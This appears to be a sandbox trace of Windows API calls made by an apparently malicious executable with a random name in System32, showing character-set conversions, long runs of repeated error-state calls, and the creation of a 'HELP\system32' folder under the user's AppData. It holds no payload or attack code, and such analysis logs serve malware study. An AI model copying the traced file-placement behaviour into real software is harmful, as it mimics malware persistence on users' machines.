¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn­`ôÜö$", lpUsedDefaultChar=0x0) returned 256 [0032.743] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.744] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x24f5a4, cbMultiByte=256, lpWideCharStr=0x24eef8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā") returned 256 [0032.744] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.744] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿည矲狰Ā", cchSrc=256, lpDestStr=0x24ece8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x24f3a4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿn­`ôÜö$", lpUsedDefaultChar=0x0) returned 256 [0032.744] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.744] GetLastError () returned 0x0 [0032.744] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.745] SetLastError (dwErrCode=0x0) [0032.745] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.746] SetLastError (dwErrCode=0x0) [0032.746] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.747] GetLastError () returned 0x0 [0032.747] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.748] SetLastError (dwErrCode=0x0) [0032.748] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.749] SetLastError (dwErrCode=0x0) [0032.749] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.750] SetLastError (dwErrCode=0x0) [0032.750] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.751] SetLastError (dwErrCode=0x0) [0032.751] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.752] SetLastError (dwErrCode=0x0) [0032.752] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.753] SetLastError (dwErrCode=0x0) [0032.753] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.754] GetLastError () returned 0x0 [0032.754] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.755] GetLastError () returned 0x0 [0032.755] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.756] GetLastError () returned 0x0 [0032.756] SetLastError (dwErrCode=0x0) [0032.757] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.757] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.757] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.758] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f720 | out: lpSystemTimeAsFileTime=0x24f720*(dwLowDateTime=0xe13e7410, dwHighDateTime=0x1d3dfba)) [0032.758] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f658, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.758] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f540, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetLastError () returned 0x0 [0032.758] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.759] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.759] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.759] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.759] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.759] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.759] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.759] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.759] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.759] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.759] GetLastError () returned 0xb7 [0032.759] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 